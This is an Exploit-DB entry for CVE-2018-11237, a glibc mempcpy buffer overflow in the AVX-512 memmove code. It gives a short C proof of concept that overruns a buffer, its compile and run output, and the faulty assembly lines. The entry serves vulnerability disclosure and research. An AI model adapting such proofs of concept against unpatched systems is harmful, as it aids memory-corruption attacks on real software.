GNU glibc < 2.27 - Local Buffer Overflow

EDB-ID: 44750
Author: JameelNabbo
Published: 2018-05-24
CVE: CVE-2018-11237
Type: Local
Platform: Linux
Vulnerable App: N/A

 # Date: 2018-05-24 
 # Exploit Author: JameelNabbo 
 # Website: jameelnabbo.com <http://jameelnabbo.com/> 
 # Vendor Homepage: http://www.gnu.org/ <http://www.gnu.org/> 
 # CVE: CVE-2018-11237 
  
  
 # POC: 
  
 $ cat mempcpy.c 
 #define _GNU_SOURCE 1 
 #include <string.h> 
 #include <assert.h> 
  
 #define N 97699 
 char a[N]; 
 char b[N+128]; 
  
 int 
 main (void) 
 { 
   memset (a, 'x', N); 
   char *c = mempcpy (b, a, N); 
   assert (*c == 0); 
 } 
 $ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy 
 $ ./mempcpy  
 mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed. 
  
 The problem is these two lines in memmove-avx512-no-vzeroupper.S: 
  
 	vmovups	%zmm4, (%rax) 
 	vmovups	%zmm5, 0x40(%rax) 
  
 For mempcpy, %rax points to the end of the buffer.

Source: www.exploit-db.com

Exploit Collector

Search Exploit

GNU glibc < 2.27 - Local Buffer Overflow